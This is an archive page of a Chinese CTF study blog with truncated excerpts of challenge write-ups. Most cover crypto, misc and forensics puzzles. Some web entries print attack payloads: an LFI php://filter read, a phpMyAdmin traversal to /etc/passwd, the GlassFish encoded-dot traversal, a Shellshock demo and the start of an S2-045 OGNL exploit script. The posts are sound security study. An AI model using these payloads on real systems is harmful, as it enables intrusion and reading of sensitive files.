「配枪朱丽叶。」

RootのCTF学习笔记。

Entries from 2019-12-01 to 1 month

RoarCTF2019/BUUCTF-forensic

时隔一个多月重新学习一哈Volatility。 shawroot.hatenablog.com 题目下载 volatility imageinfo -f 文件名 查看进程: volatility psscan -f 文件名 --profile=Win7SP1x86 Volatility Foundation Volatility Framework 2.6 Offset(P) Name PID PPID PDB Tim…

AFCTF2018/BUUCTF-BASE

题目下载 其实这道题仔细发现,不是base16就是base32要么就是base64。 稍微考察了下base16/32/64的基本特征,另外文档很大,打开很容易未响应,需要拿脚本解码。 base16就是十六进制 base32只由大写字母+数字组成 base64由大写字母+小写字母+数字组成,以及“…

i春秋圣诞CTF答题夺旗赛(第四季)做题记录(WEB+MISC+CRYPTO)

WEB部分 【nani】 啥也没有,看源代码发现一句话/index.php?file=show.php。 访问show.php得到user.php,因为是file参数考虑是否有LFI。 ?file=php://filter/read=convert.base64-encode/resource=user.php得到user.php的源码: warn); } function __wakeup(…

AFCTF2018/BUUCTF-Crypto:花开藏宝地

题目下载 题目描述: 第8080423800797740568864856616050427859314866630262641514970490562862287627086286576833795383572580196314268518251081293807211599635578239631830392702070562312065201408003280942118040098424206159252073371024348394723096…

安洵杯2019/BUUCTF:MISC-吹着贝斯扫二维码

题目下载 里面有一堆文件,打开是这样的: 随便挑几个没有后缀的文件,用010editor打开,会发现它们的文件头都是FFD8FFE0,这是jpg格式的文件头。 可以通过批处理给他们都加上后缀。 @echo off ren * *.jpg T T这是人干的事儿?可以拿PHOTOSHOP进行拼图,经…

北京工业大学(GXYCTF2019)MISC部分做题记录。

gakki 对图片进行文件提取,得到加密的rar压缩文件。 用ARCHPR进行爆破得到密码是8864。 得到一堆意义不明的字符: emmm。。算是做题经验吧,想到了词频统计,用TextDecoderToolkit这个工具很方便,得到flag: 佛系青年 一个压缩包,里面有一个未加密的1.png…

GUET-CTF2019/BUUCTF-zips

题目下载 第一层:直接解压,得到222.zip 222.zip:利用ARCHPR爆破得到压缩密码为723456,得到111.zip 111.zip:里面有一个flag.zip和一个加密的setup.sh。首先把flag.zip移到外面。然后用010editor打开111.zip,把加密位换掉。 可以发现setup.sh能正常打开…

NCTF2019/BUUCTF-Keyboard

题目: ooo yyy ii w uuu ee uuuu yyy uuuu y w uuu i i rr w i i rr rrr uuuu rrr uuuu t ii uuuu i w u rrr ee www ee yyy eee www w tt ee仔细观察会发现这里的字母只由“wertyui”组成。 对应26键键盘上。q代表1,则w代表2,e代表3,依次类推。字母代表的…

NCTF2019/BUUCTF-childRSA

题目: from random import choice from Crypto.Util.number import isPrime, sieve_base as primes from flag import flag def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes) if isPrime(n + 1): return n + 1 e = …

RGB值转图片通用脚本ouo

#-*- coding:utf-8 -*- from PIL import Image import re def RGB2pic_main(): print('请先用因数分解(被分解数为RGB.txt行数),计算可能的尺寸x,y') x = int(input('x=')) #x坐标 通过对txt里的行数进行整数分解 y = int(input('y=')) #y坐标 x*y = 行数 im…

2019_NJUPT_CTF/攻防世界:a_good_idea

题目下载:汤姆有个好主意 一个png,对它进行文件提取。得到两张tom。 刚开始以为是盲水印,两个github上的jio本都试了没用。steg神器也不好使。 想到了linux里的一条命令: 比较两张图片,输出不同的地方 (这个专业一点叫容差分析) compare 图片1.png 图…

Bash漏洞分析溯源

bash的bug————函数体外面的代码被默认地执行了先看如下代码: $ export X='() { echo "inside X"; }; echo "outside X";'再用env 查看创建出来的环境变量 $ env X=(){ echo "inside X"; }; echo "outside X";当我们在当前的bash shell进程下产生一个bash的子…

BUUCTF/HDCTF2019 - bbbbbbrsa

题目下载 给了两个文件。 第一个enc: p = 177077389675257695042507998165006460849 n = 37421829509887796274897162249367329400988647145613325367337968063341372726061 c = ==gMzYDNzIjMxUTNyIzNzIjMyYTM4MDM0gTMwEjNzgTM2UTN4cjNwIjN2QzM5ADMwIDNyMTO4…

SWPU2019-Misc:Network

题目下载 打开文件发现里面有一堆数字,仔细观察发现只有:63,127,191,255 和今年的西湖论剑预选赛的题有点像,考了TTL,参考: 标签: CTF - CodingBox技术博客 不难发现TTL值只有 63,127,191,255 四种,都是2的某次幂−1的值。于是将这四个数都转换成…

GlassFish 任意文件读取漏洞

什么是GlassFish? glassfish是一款java编写的跨平台的开源的应用服务器。漏洞原理? java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。Paylo…

安洵杯 2019:easy_web

这道题还是不太难的嘿qwq记录一哈: 仔细观察url的img的参数,复制下来,两遍base64,一遍hex可以得到明文。 同理,我们将参数改为?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=(一次hex两次base64),然后查看源代码,可以得到index的源码。

GWCTF 2019 WEB-枯燥的抽奖

哈哈,打开给👵逗乐了。 查看源代码,发现check.php:

S2-045攻击脚本

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "…

SWPU2019-MISC:伟大的侦探

题目下载 这个挺坑的。放到010editor里挨个试出来是EBCDIC。害。 得到密码:wllm_is_the_best_team!打开压缩包,是一堆小人。之前有接触过跳舞的小人密码。 有两种?密码表,这道题是第二种: 对照得: iloveholmesandwllm

MiniHttpd-CVE-2018-18778

Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_htt…

ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因…

PHPMYADMIN:CVE-2018-12613后台任意文件包含漏洞

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 payload: http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 可见…

Tomcat:CVE-2017-12615

漏洞名称:Tomcat任意文件上传漏洞 漏洞编号:CVE-2017-12615 漏洞影响:上传包含任意代码的文件,并被服务器执行。 影响平台:Windows 影响版本:Apache Tomcat 7.0.0 - 7.0.812017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-…

ThinkPHP5.0.23-Rce

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 漏洞复现: 利用hackbar或bp发送数据包如下,即可成功执行id命令: POS…

BUUCTF-WEB shrine(SSTI)

import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').r</path:shrine>…

BUUCTF/ZJCTF2019 WEB-NiZhuanSiWei

<h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //u…

RSA-只有密文

怎么办,已经截获了密文和模数n!能够破解吗?请分解出RSA中的两个大素数q和p。提交格式是key{x}x为两个素数中较小的那个的MD5前8位。 题目下载 他让求的是p和q,200个密文里可能会有和n相同的质数q, 所以大概意思就是让密文分别和N求最大公约数 n = 135176…

2018百越杯Crypto-RSA

题目下载 第一步利用openssl把n和e求出来: 可以发现n不算太大,丢到大数分解网站里可以得到: p:184333227921154992916659782580114145999 q:336771668019607304680919844592337860739 到这里常规解就会报错了,参考了下大佬的wp: 同时看encrypt函数,可…

掘安杯-Crypto:RSA脚本一把梭 (模不互素)

N is 186743751083130949285851565811389413685700222221909454612844026732040180753540698271860858513098065923987216288453368405327795791973029849876615472454231807609580228985464965242492016795434211588421034964528619321831443433159251061543…

BUUCTF/HDCTF2019 together

题目下载 开局四个文件,分别来看一下嘛。 myflag1 R3Noy6r3WLItytAmb4FmHEygoilucEEZbO9ZYXx5JN03HNpBLDx7fXd2fl+UL5+11RCs/y0qlTGURWWDtG66eNLzGwNpAKiVj6I7RtUJl2Pcm3NvFeAFwI9UsVREyh7zIV6sI9ZP8l/2GVDorLAz5ULW+f0OINGhJmZm8FL/aDnlfTElhQ87LPicWpXYoMt…